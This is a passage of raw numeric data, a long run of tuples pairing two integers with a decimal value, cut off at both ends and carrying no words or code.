5,1.12),(117,38706,0.42),(117,38707,0.98),(117,38708,1.09669),(117,38709,0.95669),(119,38709,0.95669),(117,38710,1.05),(117,38711,0.56),(117,38712,1.05),(117,38713,1.16669),(117,38714,0.91),(117,38715,0.98),(117,38716,0.95669),(117,38717,1.05),(117,38718,0.18669),(117,38719,0.91),(117,38720,1.02669),(117,38721,0.81669),(117,38722,0.93331),(117,38723,0.93331),(117,38724,0.51331),(117,38725,1.05),(117,38726,1.21331),(117,38727,0.98),(117,38728,1.12),(117,38729,1.00331),(117,38730,1.09669),(117,38731,0.95669),(117,38732,1.12),(117,38733,1.05),(117,38734,1.16669),(117,38735,1.05),(117,38736,0.23331),(117,38737,0.88669),(117,38738,0.98),(117,38739,0.93331),(117,38740,1.05),(117,38741,0.28),(117,38742,0.93331),(117,38743,1.09669),(117,38744,0.37331),(125,38744,0.37331),(117,38745,0.93331),(117,38746,1.07331),(117,38747,0.42),(117,38748,1.07331),(117,38749,1.23669),(117,38750,0.28),(117,38751,0.91),(117,38752,1.09669),(117,38753,0.95669),(117,38754,1.12),(117,38755,0.51331),(117,38756,1.05),(117,38757,1.21331),(117,38758,0.42),(117,38759,1.00331),(117,38760,1.09669),(117,38761,0.32669),(117,38762,0.93331),(117,38763,1.12),(117,38764,0.28),(117,38765,1.00331),(117,38766,1.07331),(117,38767,0.65338),(117,38768,1.00331),(117,38769,1.12),(117,38770,0.98),(117,38771,1.07331),(118,39144,0.91),(118,39145,1.12),(118,39146,0.84),(118,39147,0.91),(118,39148,0.91),(118,39149,1.02669),(118,39150,1.00331),(118,39151,0.98),(118,39152,0.95669),(118,39153,1.14331),(118,39154,0.93331),(118,39155,1.02669),(118,39156,0.46662),(118,39157,0.95669),(118,39158,1.09669),(118,39159,0.95669),(118,39160,1.05),(118,39161,1.05),(118,39162,0.42),(118,39163,1.16669),(118,39164,1.4),(118,39165,1.00331),(118,39166,1.00331),(118,39167,1.16669),(118,39168,0.93331),(118,39169,1.07331),(118,39170,1.19),(118,39171,1.05),(118,39172,1.28331),(118,39173,0.91),(118,39174,0.98),(118,39175,1.00331),(118,39176,1.14331),(118,39177,0.88669),(118,39178,0.98),(118,39179,0.95669),(118,39180,1.19),(118,39181,0.95669),(118,39182,1.07331),(118,39183,0.91),(118,39184,0.88669),(118,39185,1.05),(118,39186,0.98),(118,39187,0.88669),(118,39188,1.05),(118,39189,0.98),(118,39190,1.09669),(118,39191,1.07331),(118,39192,1.05),(118,39193,1.28331),(118,39194,1.91338),(118,39195,2.19338),(118,39196,0.74662),(126,39196,0.74662),(123,39196,1.49324),(118,39197,1.05),(118,39198,1.16669),(118,39199,1.07331),(118,39200,1.16669),(118,39201,0.98),(118,39202,0.32669),(118,39203,0.93331),(118,39204,1.09669),(118,39205,1.00331),(118,39206,1.12),(118,39207,0.23331),(118,39208,0.95669),(118,39209,1.09669),(118,39210,0.88669),(118,39211,0.95669),(118,39589,0.28),(118,39590,1.05),(118,39591,1.16669),(118,39592,0.84),(118,39593,0.93331),(118,39594,0.98),(118,39595,1.05),(118,39596,5.18),(118,39597,5.42679),(118,39598,0.28),(118,39599,0.93331),(118,39600,1.07331),(118,39601,0.95669),(118,39602,1.02669),(118,39603,0.95669),(118,39604,1.07331),(118,39605,0.32669),(118,39606,0.98),(118,39607,1.12),(118,39608,0.28),(118,39609,1.16669),(118,39610,1.26),(118,39611,0.93331),(118,39612,1.12),(118,39613,0.18669),(118,39614,0.93331),(118,39615,1.07331),(118,39616,0.88669),(118,39617,1.02669),(118,39618,0.23331),(118,39619,0.88669),(118,39620,0.98),(118,39621,0.23331),(118,39622,0.95669),(118,39623,1.02669),(118,39624,1.02669),(118,39625,1.12),(118,39626,0.23331),(118,39627,0.98),(118,39628,1.12),(118,39629,0.32669),(118,39630,0.95669),(118,39631,1.23669),(118,39632,0.32669),(118,39633,0.95669),(118,39634,1.19),(118,39635,0.46669),(118,39636,1.02669),(118,39637,1.12),(118,39638,0.93331),(118,39639,1.05),(119,39831,0.79331),(119,39832,0.91),(119,39833,0.86331),(119,39834,1.05),(119,39835,0.95669),(119,39836,0.86331),(126,39836,0.86331),(119,39837,0.98),(119,39838,0.93331),(119,39839,1.12),(119,39840,0.95669),(119,39841,1.14331),(119,39842,1.00331),(119,39843,0.93331),(126,39843,0.93331),(119,39844,0.84),(119,39845,0.95669),(119,39846,0.91),(119,39847,1.07331),(119,39848,0.84),(119,39849,0.98),(119,39850,0.84),(119,39851,1.07331),(119,39852,0.86331),(119,39853,1.12),(119,39854,0.88669),(119,39855,0.86331),(119,39856,0.95669),(119,39857,0.91),(119,39858,1.02669),(119,39859,0.91),(119,39860,1.02669),(119,39861,0.84),(119,39862,1.07331),(119,39863,0.95669),(119,39864,0.88669),(119,39865,1.09669),(119,39866,0.91),(119,39867,0.56),(119,39868,1.00331),(119,39869,1.09669),(119,39870,0.88669),(119,39871,1.02669),(119,39872,0.88669),(119,39873,0.98),(119,39874,1.05),(119,39875,1.14331),(119,39876,1.05),(119,39877,0.23331),(119,39878,0.86331),(119,39879,1.00331),(119,39880,0.51331),(119,39881,1.02669),(119,39882,1.12),(119,39883,0.42),(119,39884,1.00331),(119,39885,1.12),(119,39886,0.95669),(119,39887,1.16669),(119,39888,0.91),(119,39889,0.32669),(119,39890,1.09669),(119,39891,1.19),(119,39892,0.86331),(119,39893,0.98),(119,39894,0.98),(119,39895,1.19),(119,39896,0.51331),(119,39897,1.16669),(119,39898,1.28331),(119,39899,0.79331),(119,39900,0.93331),(119,39901,1.07331),(119,39902,0.81669),(119,39903,0.95669),(119,39904,0.84),(119,39905,0.95669),(119,39906,0.95669),(119,39907,0.93331),(119,39908,0.93331),(119,39909,0.95669),(119,39910,1.02669),(119,39911,0.91),(119,39912,0.98),(119,39913,0.93331),(119,39914,1.00331),(119,39915,0.86331),(119,39916,0.95669),(119,39917,0.93331),(119,39918,0.98),(119,39919,1.07331),(119,39920,1.19),(119,39921,0.88669),(119,39922,0.95669),(119,39923,1.02669),(119,39924,1.07331),(119,39925,1.14331),(119,39926,0.95669),(119,39927,0.86331),(119,39928,1.07331),(119,39929,0.88669),(119,39930,0.98),(119,39931,1.05),(119,39932,1.16669),(119,39933,0.95669),(119,39934,1.14331),(119,39935,0.88669),(119,39936,0.98),(119,39937,0.98),(119,39938,0.88669),(119,39939,0.98),(119,39940,0.98),(119,39941,0.93331),(119,39942,1.07331),(119,39943,1.02669),(119,39944,1.14331),(119,39945,0.65331),(119,39946,1.12),(119,39947,1.21331),(119,39948,1.00331),(119,39949,2.58993),(119,39950,0.95669),(119,39951,0.98),(119,39952,0.95669),(119,39953,0.91),(119,39954,1.07331),(119,39955,0.91),(119,39956,1.00331),(119,39957,1.91338),(119,39958,1.02669),(119,39959,1.09669),(119,39960,0.37331),(119,39961,0.93331),(119,39962,1.07331),(119,39963,0.98),(119,39964,0.93331),(119,39965,0.91),(119,39966,0.98),(119,39967,0.23331),(119,39968,0.88669),(119,39969,1.07331),(119,39970,0.28),(119,39971,0.91),(119,39972,1.09669),(119,39973,0.32669),(119,39974,1.02669),(119,39975,1.21331),(119,39976,0.46669),(119,39977,1.07331),(119,39978,1.14331),(119,39979,0.84),(119,39980,0.98),(119,39981,1.14331),(119,39982,1.05),(119,39983,1.26),(119,39984,1.00331),(119,39985,0.84),(119,39986,0.91),(119,39987,0.91),(119,39988,1.05),(119,39989,0.32669),(120,39989,0.32669),(119,39990,1.07331),(119,39991,1.28331),(119,39992,0.42),(119,39993,1.16669),(119,39994,1.28331),(119,39995,0.37331),(119,39996,1.07331),(119,39997,1.23669),(119,39998,0.42),(119,39999,1.00331),(119,40000,1.14331),(119,40709,0.95669),(119,40710,1.05),(119,40711,0.93331),(119,40712,1.14331),(119,40713,1.00331),(119,40714,1.07331),(119,40715,0.91),(119,40716,1.12),(119,40717,0.91),(119,40718,1.00331),(119,40719,0.37331),(119,40720,0.95669),(119,40721,1.05),(119,40722,0.14),(119,40723,0.86331),(119,40724,1.00331),(119,40725,1.02669),(119,40726,1.14331),(119,40727,0.32669),(119,40728,0.98),(119,40729,1.16669),(119,40730,0.98),(119,40731,1.05),(119,40732,0.51331),(119,40733,1.07331),(119,40734,1.16669),(119,40735,0.37331),(119,40736,1.09669),(119,40737,1.26),(119,40738,1.05),(119,40739,1.12),(119,40740,0.23331),(119,40741,0.86331),(119,40742,0.95669),(119,40743,0.93331),(119,40744,1.05),(119,40745,0.95669),(119,40746,1.05),(119,40747,0.88669),(119,40748,0.95669),(119,40749,1.07331),(119,40750,0.98),(119,40751,1.12),(119,40752,1.02669),(119,40753,1.09669),(119,40754,0.88669),(119,40755,1.07331),(119,40756,0.88669),(119,40757,1.14331),(119,40758,1.09669),(119,40759,0.91),(119,40760,1.05),(119,40761,0.18669),(119,40762,0.98),(119,40763,1.23669),(119,40764,1.00331),(119,40765,1.19),(119,40766,0.28),(119,40767,0.91),(119,40768,0.95669),(119,40769,0.32669),(119,40770,0.95669),(119,40771,1.02669),(119,40772,1.07331),(119,40773,1.28331),(119,40774,0.23331),(119,40775,0.88669),(119,40776,0.98),(119,40777,0.37331),(119,40778,1.00331),(119,40779,1.09669),(119,40780,0.37331),(119,40781,1.00331),(119,40782,1.09669),(119,40783,0.84),(119,40784,0.93331),(119,40785,0.93331),(119,40786,1.00331),(120,40787,0.32669),(119,40787,0.65338),(128,40787,1.72679),(119,40788,0.95669),(119,40789,1.02669),(119,40790,1.05),(119,40791,1.21331),(119,40792,0.37331),(119,40793,1.00331),(119,40794,1.16669),(119,40795,0.88669),(119,40796,1.09669),(119,40797,0.93331),(119,40798,1.02669),(119,40799,0.46669),(119,40800,1.00331),(119,40801,1.19),(119,40802,0.65338),(119,40803,1.96),(119,40804,2.19338),(119,40805,0.42),(119,40806,1.09669),(119,40807,1.33),(119,40808,1.91338),(119,40809,1.16669),(119,40810,1.05),(119,40811,0.37331),(119,40812,0.98),(119,40813,1.12),(120,41129,0.79331),(120,41130,0.86331),(120,41131,0.79331),(120,41132,0.91),(120,41133,0.84),(120,41134,1.02669),(120,41135,0.91),(120,41136,1.07331),(120,41137,0.91),(120,41138,1.12),(120,41139,0.84),(120,41140,0.91),(120,41141,0.88669),(120,41142,0.95669),(120,41143,1.86662),(120,41144,1.02669),(120,41145,1.00331),(120,41146,0.95669),(120,41147,1.14331),(120,41148,0.91),(120,41149,1.14331),(120,41150,0.98),(120,41151,0.95669),(120,41152,1.14331),(120,41153,0.98),(120,41154,0.84),(120,41155,0.91),(120,41156,0.95669),(120,41157,1.12),(120,41158,1.68),(120,41159,0.95669),(120,41160,1.00331),(120,41161,1.72662),(120,41162,1.07331),(120,41163,1.02669),(120,41164,0.88669),(120,41165,0.95669),(120,41166,0.79331),(120,41167,0.86331),(120,41168,0.84),(120,41169,0.91),(120,41170,0.88669),(120,41171,1.09669),(120,41172,0.95669),(120,41173,1.07331),(120,41174,0.93331),(120,41175,1.00331),(120,41176,0.93331),(120,41177,1.12),(120,41178,0.91),(120,41179,1.12),(120,41180,0.81669),(120,41181,0.91),(120,41182,1.02669),(120,41183,0.91),(120,41184,1.19),(120,41185,0.28),(120,41186,1.00331),(120,41187,1.19),(120,41188,0.32669),(120,41189,0.93331),(120,41190,1.00331),(120,41191,0.51331),(120,41192,1.00331),(120,41193,1.12),(120,41194,0.28),(120,41195,0.98),(120,41196,1.14331),(120,41197,0.98),(120,41198,1.16669),(120,41199,1.00331),(120,41200,1.12),(120,41201,1.12),(120,41202,1.23669),(120,41203,1.02669),(120,41204,1.19),(120,41205,0.32669),(120,41206,0.95669),(120,41207,1.07331),(120,41208,0.88669),(120,41209,1.02669),(120,41210,0.88669),(120,41211,1.02669),(120,41212,0.93331),(120,41213,0.98),(120,41214,1.02669),(120,41215,0.98),(120,41216,1.09669),(120,41217,1.07331),(120,41218,0.23331),(120,41219,0.88669),(120,41220,0.98),(120,41221,0.23331),(120,41222,0.93331),(120,41223,1.09669),(120,41224,0.93331),(120,41225,1.00331),(120,41226,0.23331),(120,41227,1.00331),(120,41228,1.19),(120,41229,0.91),(120,41230,1.00331),(120,41231,0.98),(120,41232,1.09669),(120,41233,0.86331),(120,41234,0.93331),(120,41235,1.07331),(120,41236,1.19),(120,41237,0.98),(120,41238,1.16669),(120,41239,1.05),(120,41240,1.12),(120,41241,0.95669),(120,41242,1.19),(120,41243,1.09669),(120,41244,1.02669),(120,41245,1.05),(120,41246,1.05),(120,41247,1.19),(120,41248,0.95669),(120,41249,1.16669),(120,41250,0.88669),(120,41251,0.95669),(120,41252,1.02669),(120,41253,0.93331),(120,41254,1.00331),(120,41255,0.95669),(120,41256,1.02669),(120,41257,0.95669),(120,41258,1.07331),(120,41259,1.12),(120,41260,0.88669),(120,41261,1.00331),(120,41262,0.86331),(120,41263,0.98),(120,41264,0.98),(120,41265,1.19),(120,41266,1.00331),(120,41267,1.12),(120,41268,0.95669),(120,41269,1.02669),(120,41270,0.88669),(120,41271,1.00331),(120,41272,1.05),(120,41273,1.30669),(120,41274,1.00331),(120,41275,1.07331),(120,41276,0.98),(120,41277,1.02669),(120,41278,0.95669),(120,41279,1.07331),(120,41280,1.05),(120,41281,0.98),(120,41282,1.02669),(120,41283,0.95669),(120,41284,1.02669),(120,41285,0.88669),(120,41286,1.00331),(120,41287,0.91),(120,41288,1.21331),(120,41289,1.09669),(128,41289,1.09669),(120,41290,1.82),(120,41291,1.07331),(120,41292,1.09669),(120,41293,0.91),(120,41294,0.98),(120,41295,0.95669),(120,41296,1.00331),(120,41297,0.42),(120,41298,1.09669),(120,41299,1.21331),(120,41300,0.42),(120,41301,1.19),(120,41302,1.33),(120,41303,1.91338),(120,41304,1.09669),(120,41305,1.05),(120,41306,1.07331),(120,41307,1.14331),(120,41308,1.05),(120,41309,0.84),(120,41310,1.05),(120,41311,0.98),(120,41312,1.21331),(120,41313,0.98),(120,41314,1.21331),(120,41315,0.86331),(120,41316,0.95669),(120,41317,0.95669),(120,41318,0.23331),(120,41319,0.93331),(120,41320,1.09669),(120,41321,0.88669),(120,41322,1.09669),(120,41323,0.88669),(120,41324,0.98),(120,41325,0.91),(120,41326,1.09669),(120,41327,0.86331),(120,41328,0.95669),(120,41329,0.84),(120,41330,1.05),(120,41331,0.98),(120,41332,1.09669),(120,41333,0.86331),(120,41334,0.98),(120,41335,0.86331),(120,41336,0.98),(120,41337,0.88669),(120,41338,1.16669),(120,41339,0.42),(120,41340,1.00331),(120,41341,1.21331),(120,41342,0.98),(120,41343,1.09669),(120,41344,0.42),(120,41345,0.98),(120,41346,1.07331),(120,42511,0.86331),(120,42512,1.05),(120,42513,0.86331),(126,42513,0.86331),(120,42514,0.95669),(120,42515,0.88669),(120,42516,1.21331),(120,42517,0.98),(120,42518,1.14331),(120,42519,0.46662),(120,42520,2.00662),(120,42521,1.07331),(120,42522,1.30669),(120,42523,0.98),(120,42524,0.65338),(120,42525,0.95669),(120,42526,1.07331),(120,42527,0.95669),(120,42528,1.05),(120,42529,0.32669),(120,42530,1.14331),(120,42531,1.26),(120,42532,1.02669),(120,42533,1.14331),(120,42534,0.98),(120,42535,1.05),(120,42536,0.28),(120,42537,1.05),(120,42538,1.19),(120,42539,0.93331),(120,42540,1.16669),(120,42541,0.93331),(120,42542,1.05),(120,42543,0.84),(120,42544,0.91),(120,42545,0.95669),(120,42546,1.02669),(120,42547,0.91),(120,42548,1.07331),(120,42549,0.18669),(120,42550,0.91),(120,42551,1.00331),(120,42552,0.93331),(120,42553,1.19),(120,42554,0.95669),(120,42555,1.07331),(120,42556,0.93331),(120,42557,1.14331),(120,42558,0.28),(120,42559,0.95669),(120,42560,1.19),(120,42561,0.98),(120,42562,1.16669),(120,42563,0.23331),(120,42564,0.98),(120,42565,1.09669),(120,42566,0.46669),(120,42567,1.07331),(120,42568,1.21331),(120,42569,0.51331),(120,42570,1.05),(120,42571,1.23669),(120,42572,0.93331),(120,42573,1.07331),(120,42574,0.98),(120,42575,1.19),(120,42576,1.12),(120,42577,1.4),(120,42578,1.02669),(120,42579,1.14331),(120,42580,1.00331),(120,42581,1.09669),(120,42582,1.00331),(120,42583,1.14331),(120,42584,0.37331),(120,42585,0.98),(120,42586,1.14331),(120,42587,0.91),(120,42588,0.91),(120,42589,1.00331),(120,42590,0.37331),(128,42590,0.37331),(120,42591,0.98),(120,42592,1.12),(120,42593,0.28),(120,42594,0.95669),(120,42595,1.14331),(120,42596,0.37331),(120,42597,0.93331),(120,42598,1.05),(120,42599,0.28),(120,42600,0.91),(120,42601,1.05),(120,42602,1.00331),(120,42603,1.12),(120,42604,0.91),(120,42605,1.00331),(120,42606,1.05),(120,42607,0.91),(120,42608,1.02669),(120,42609,1.02669),(120,42610,1.30669),(120,42611,0.42),(120,42612,1.00331),(120,42613,1.21331),(120,42614,0.93331),(120,42615,1.12),(120,42616,1.00331),(120,42617,1.16669),(120,42618,0.46669),(120,42619,1.12),(120,42620,1.19),(120,42621,0.84),(120,42622,0.95669),(120,42623,0.37331),(120,42624,0.95669),(120,42625,1.05),(120,42626,0.37331),(120,42627,0.98),(120,42628,1.09669),(120,42629,0.32669),(120,42630,0.93331),(120,42631,1.12),(121,43035,0.88669),(121,43036,0.95669),(121,43037,0.37331),(121,43038,0.93331),(121,43039,1.19),(121,43040,1.09669),(121,43173,1.09669),(121,43174,1.16669),(121,43381,0.09331),(121,43382,1.02669),(121,43383,1.07331),(121,43384,0.23331),(121,43385,1.00331),(121,43386,1.05),(121,43387,0.14),(121,43388,0.98),(121,43389,1.02669),(121,43390,0.18669),(121,43391,0.88669),(121,43392,1.05),(121,43393,0.84),(121,43394,0.95669),(121,43395,0.23331),(121,43396,0.88669),(121,43397,1.02669),(121,43398,0.56),(121,43399,1.14331),(121,43400,1.21331),(121,43401,0.88669),(121,43402,1.02669),(121,43403,0.93331),(121,43404,1.09669),(121,43405,0.98),(121,43406,1.14331),(121,43407,1.26),(121,43408,1.4),(121,43409,1.12),(121,43410,1.07331),(121,43411,1.30669),(121,43412,1.28331),(121,43413,1.37669),(121,43414,0.69993),(121,43415,1.09669),(121,43416,1.14331),(121,43417,1.86662),(121,43418,2.14662),(121,43419,0.42),(121,43420,1.12),(121,43421,1.16669),(121,43422,0.18669),(121,43423,1.05),(121,43424,1.23669),(121,43425,5.30321),(123,44482,0.84),(123,44483,0.95669),(123,44484,0.84),(123,44485,0.91),(123,44486,0.81669),(123,44487,1.00331),(123,44488,1.02669),(123,44489,0.95669),(123,44490,1.05),(123,44491,0.91),(123,44492,0.98),(123,44493,0.32669),(123,44494,1.16669),(123,44495,1.26),(123,44496,2.00662),(123,44497,1.21331),(123,44498,1.16669),(126,44499,0.28),(123,44499,0.56),(123,44500,1.07331),(123,44501,1.28331),(123,44502,0.95669),(123,44503,1.07331),(123,44504,0.32669),(123,44505,0.95669),(123,44506,1.16669),(123,44507,0.32669),(123,44508,1.07331),(123,44509,1.19),(123,44510,1.07331),(123,44511,1.19),(123,44512,0.98),(123,44513,1.12),(123,44514,0.98),(123,44515,1.28331),(123,44516,0.95669),(123,44517,1.26),(123,44518,0.88669),(123,44519,1.00331),(123,44520,1.16669),(123,44521,1.00331),(123,44522,0.93331),(123,44523,1.12),(123,44524,0.91),(123,44525,0.93331),(123,44526,0.7),(123,44527,1.21331),(123,44528,1.33),(123,44529,0.56),(123,44530,0.98),(123,44531,1.09669),(123,44532,1.05),(123,44533,1.19),(123,44534,0.98),(123,44535,1.07331),(123,44536,0.60669),(123,44537,1.16669),(123,44538,1.26),(123,44539,0.84),(123,44540,0.98),(123,44541,1.00331),(123,44542,1.12),(123,44543,0.32669),(123,44544,1.00331),(123,44545,1.12),(123,44546,0.18669),(123,44547,0.88669),(123,44548,1.00331),(123,44549,0.32669),(123,44550,0.93331),(123,44551,1.02669),(123,44552,2.05338),(126,44552,2.05338),(123,44553,2.42662),(123,44554,0.95669),(123,44555,1.28331),(123,44556,1.05),(123,44557,1.16669),(123,44558,0.93331),(123,44559,1.00331),(123,44560,0.86331),(123,44561,1.07331),(123,44562,0.86331),(123,44563,1.05),(123,44564,0.86331),(123,44565,1.09669),(123,44566,0.91),(123,44567,1.02669),(123,44568,0.98),(123,44569,1.16669),(123,44570,0.81669),(123,44571,1.05),(123,44572,0.86331),(123,44573,0.95669),(123,44574,1.00331),(123,44575,0.32669),(123,44576,1.05),(123,44577,1.14331),(123,44578,0.18669),(123,44579,0.98),(123,44580,1.16669),(123,44581,0.88669),(123,44582,1.00331),(123,44583,0.86331),(123,44584,0.98),(123,44585,0.28),(123,44586,0.93331),(123,44587,1.05),(123,44588,1.02669),(123,44589,0.98),(123,44590,1.19),(123,44591,0.32669),(123,44592,0.93331),(123,44593,1.16669),(123,45197,0.86331),(123,45198,0.98),(123,45199,0.56),(123,45200,2.19338),(123,45201,1.21331),(123,45202,1.16669),(123,45203,0.91),(123,45204,1.07331),(123,45205,0.88669),(123,45206,1.09669),(123,45207,1.02669),(123,45208,1.05),(123,45209,1.12),(123,45210,0.98),(123,45211,1.16669),(123,45212,0.65338),(123,45213,1.12),(123,45214,1.35331),(123,45215,0.98),(123,45216,1.16669),(123,45217,0.95669),(123,45218,1.02669),(123,45219,0.93331),(123,45220,0.95669),(123,45221,1.12),(123,45222,1.19),(123,45223,1.02669),(123,45224,1.72662),(123,45225,1.02669),(123,45226,0.93331),(123,45227,0.46669),(123,45228,0.98),(123,45229,1.07331),(123,45230,0.23331),(123,45231,0.95669),(123,45232,1.09669),(123,45233,1.91338),(123,45234,1.14331),(123,45235,1.16669),(123,45236,0.93331),(123,45237,1.12),(123,45238,0.88669),(123,45239,1.00331),(123,45240,0.91),(123,45241,1.09669),(123,45242,0.88669),(123,45243,1.07331),(123,45244,0.37331),(123,45245,1.02669),(123,45246,1.12),(123,45247,0.91),(123,45248,1.07331),(123,45249,0.37331),(123,45250,1.07331),(123,45251,1.14331),(123,45252,0.37331),(123,45253,1.09669),(123,45254,1.28331),(123,45255,0.32669),(123,45256,0.98),(123,45257,1.05),(123,45258,1.12),(125,46934,0.28),(125,47367,0.93331),(125,47368,0.93331),(125,47369,1.19),(125,47370,0.88669),(125,47371,1.00331),(125,47372,1.09669),(125,47373,0.79331),(125,47374,0.93331),(125,47375,0.84),(125,47376,0.91),(125,47377,0.88669),(125,47378,1.02669),(125,47379,1.00331),(125,47380,0.91),(125,47381,1.05),(125,47382,0.88669),(125,47383,1.12),(125,47384,0.91),(125,47385,1.09669),(125,47386,0.86331),(125,47387,1.02669),(125,47388,0.93331),(125,47389,1.00331),(125,47390,0.84),(125,47391,1.00331),(125,47392,0.84),(125,47393,0.98),(125,47394,1.00331),(125,47395,1.00331),(125,47396,0.91),(125,47397,1.00331),(125,47398,1.05),(125,47399,1.14331),(125,47400,1.00331),(125,47401,1.07331),(125,47402,0.98),(125,47403,1.16669),(125,47404,0.65331),(125,47405,1.12),(125,47406,1.26),(125,47407,0.14),(125,47408,0.84),(125,47409,0.88669),(125,47410,0.93331),(125,47411,1.00331),(125,47412,0.28),(125,47413,1.00331),(125,47414,1.09669),(125,47415,0.42),(125,47416,1.12),(125,47417,1.35331),(125,47418,0.95669),(125,47419,1.14331),(125,47420,0.95669),(125,47421,1.21331),(125,47422,1.82),(125,47423,1.05),(125,47424,1.05),(125,47425,0.95669),(125,47426,1.12),(125,47427,0.93331),(125,47428,1.00331),(125,47429,0.91),(125,47430,0.95669),(125,47431,0.88669),(125,47432,0.95669),(125,47433,0.37331),(125,47434,1.16669),(125,47435,1.4),(125,47436,0.98),(125,47437,1.26),(125,47438,0.95669),(125,47439,1.05),(125,47440,0.91),(125,47441,1.07331),(125,47442,0.95669),(125,47443,0.91),(125,47444,1.02669),(125,47445,0.88669),(125,47446,1.09669),(125,47447,0.88669),(125,47448,1.05),(125,47449,0.88669),(125,47450,1.00331),(125,47451,0.91),(125,47452,1.12),(125,47453,1.05),(125,47454,0.86331),(125,47455,0.98),(125,47456,1.12),(125,47457,1.05),(125,47458,1.14331),(125,47459,1.07331),(125,47460,1.00331),(125,47461,1.12),(125,47462,1.02669),(125,47463,1.28331),(125,47464,0.28),(125,47465,0.95669),(125,47466,1.00331),(125,47467,0.95669),(125,47468,1.09669),(125,47469,0.86331),(125,47470,1.02669),(125,47471,1.00331),(125,47472,1.16669),(125,47473,0.91),(125,47474,0.86331),(125,47475,1.09669),(125,47476,1.05),(125,47477,0.88669),(125,47478,0.95669),(125,47479,1.00331),(125,47480,0.14),(125,47481,0.84),(125,47482,0.93331),(125,47483,0.28),(125,47484,0.91),(125,47485,1.05),(125,47486,0.98),(125,47487,1.09669),(125,47488,0.88669),(125,47489,1.00331),(125,48001,0.88669),(125,48002,1.05),(125,48003,1.02669),(125,48004,1.19),(125,48005,0.88669),(125,48006,0.93331),(125,48007,0.98),(125,48008,1.07331),(125,48009,0.84),(125,48010,1.02669),(125,48011,0.98),(125,48012,1.21331),(125,48013,0.28),(125,48014,0.91),(125,48015,1.07331),(125,48016,0.98),(125,48017,0.95669),(125,48018,1.05),(125,48019,1.07331),(125,48020,1.19),(125,48021,0.98),(125,48022,1.12),(125,48023,0.32669),(125,48024,0.93331),(125,48025,1.02669),(125,48026,0.84),(125,48027,0.95669),(125,48028,0.98),(125,48029,1.07331),(125,48030,0.86331),(125,48031,1.00331),(125,48032,0.42),(125,48033,1.07331),(125,48034,1.16669),(125,48035,0.46669),(125,48036,1.09669),(125,48037,1.28331),(125,48038,1.19),(125,48039,0.46669),(125,48040,1.07331),(125,48041,1.14331),(125,48042,0.28),(125,48043,1.00331),(125,48044,1.16669),(125,48045,0.93331),(125,48046,1.07331),(125,48047,0.88669),(125,48048,1.12),(125,48049,0.98),(125,48050,1.07331),(125,48051,0.37331),(125,48052,1.02669),(125,48053,1.12),(125,48054,1.00331),(125,48055,1.07331),(125,48056,0.98),(125,48057,1.09669),(125,48058,0.32669),(133,48058,0.65338),(125,48059,0.91),(125,48060,1.09669),(126,48333,0.79331),(126,48334,0.93331),(126,48335,0.79331),(126,48336,0.86331),(126,48337,0.79331),(126,48338,0.86331),(126,48339,0.93331),(126,48340,0.88669),(126,48341,0.98),(126,48342,0.84),(126,48343,0.91),(126,48344,0.93331),(126,48345,1.09669),(126,48346,1.02669),(126,48347,0.81669),(126,48348,1.00331),(126,48349,2.1),(126,48350,1.26),(126,48351,1.26),(126,48352,0.37331),(126,48353,0.98),(126,48354,1.09669),(126,48355,0.93331),(126,48356,1.16669),(126,48357,0.98),(126,48358,1.16669),(126,48359,1.09669),(126,48360,1.02669),(126,48361,1.09669),(126,48362,0.91),(126,48363,1.00331),(126,48364,0.84),(126,48365,1.07331),(126,48366,0.93331),(126,48367,1.07331),(126,48368,0.93331),(126,48369,1.05),(126,48370,1.00331),(126,48371,1.16669),(126,48372,0.88669),(126,48373,1.07331),(126,48374,0.81669),(126,48375,0.88669),(126,48376,0.84),(126,48377,0.88669),(126,48378,0.88669),(126,48379,1.05),(126,48380,0.98),(126,48381,1.05),(126,48382,1.05),(126,48383,1.35331),(126,48384,0.88669),(126,48385,1.05),(126,48386,0.91),(126,48387,1.09669),(126,48388,0.91),(126,48389,1.07331),(126,48390,1.02669),(126,48391,1.21331),(126,48392,0.93331),(126,48393,1.02669),(126,48394,1.05),(126,48395,0.88669),(126,48396,1.00331),(126,48397,1.00331),(126,48398,1.21331),(126,48399,0.88669),(126,48400,1.00331),(126,48401,0.95669),(126,48402,1.16669),(126,48403,0.98),(126,48404,1.05),(126,48405,2.52),(126,48406,0.95669),(126,48407,0.95669),(126,48408,1.02669),(126,48409,1.07331),(126,48410,0.86331),(126,48411,1.07331),(126,48412,1.00331),(126,48992,0.86331),(126,48993,0.98),(126,48994,0.95669),(126,48995,1.00331),(126,48996,0.98),(126,48997,1.05),(126,48998,1.12),(126,48999,2.19338),(126,49000,1.26),(126,49001,1.26),(126,49002,1.00331),(126,49003,1.19),(126,49004,0.42),(126,49005,0.98),(126,49006,1.07331),(126,49007,0.23331),(126,49008,0.93331),(126,49009,1.05),(126,49010,0.42),(126,49011,1.00331),(126,49012,1.19),(126,49013,1.05),(126,49014,1.30669),(126,49015,0.98),(126,49016,1.16669),(126,49017,0.23331),(126,49018,0.98),(126,49019,1.02669),(126,49020,0.37331),(126,49021,1.05),(126,49022,1.16669),(126,49023,1.07331),(126,49024,1.19),(126,49025,0.32669),(126,49026,1.07331),(126,49027,1.19),(126,49028,0.28),(126,49029,0.91),(126,49030,0.98),(126,49031,0.51331),(126,49032,1.07331),(126,49033,1.16669),(126,49034,0.14),(126,49035,0.93331),(126,49036,1.05),(126,49037,0.86331),(126,49038,0.95669),(126,49039,0.93331),(126,49040,1.21331),(126,49041,1.05),(126,49042,1.26),(126,49043,0.74662),(126,49044,0.98),(126,49045,1.14331),(126,49046,1.02669),(126,49047,1.09669),(126,49048,0.46669),(126,49049,1.12),(126,49050,1.26),(126,49051,0.42),(126,49052,0.98),(126,49053,1.09669),(126,49054,3.36),(126,49055,1.02669),(126,49056,1.19),(126,49057,1.12),(126,49058,1.26),(126,49059,0.98),(126,49060,1.14331),(126,49061,1.02669),(126,49062,1.21331),(126,49063,1.14331),(126,49064,1.21331),(126,49065,1.12),(126,49066,1.26),(126,49067,1.00331),(126,49068,1.16669),(126,49069,1.07331),(126,49070,1.19),(126,49071,0.91),(126,49072,1.05),(126,49073,0.93331),(126,49074,1.02669),(126,49075,0.37331),(126,49076,1.02669),(126,49077,1.16669),(126,49078,0.56),(126,49079,1.05),(126,49080,1.23669),(126,49081,0.98),(126,49082,1.05),(126,49083,0.88669),(126,49084,1.05),(126,49085,0.32669),(126,49086,1.00331),(126,49087,1.07331),(126,49088,1.21331),(126,49089,0.51331),(126,49090,1.07331),(126,49091,1.21331),(126,49092,0.74662),(126,49093,1.96),(126,49094,2.1),(126,49095,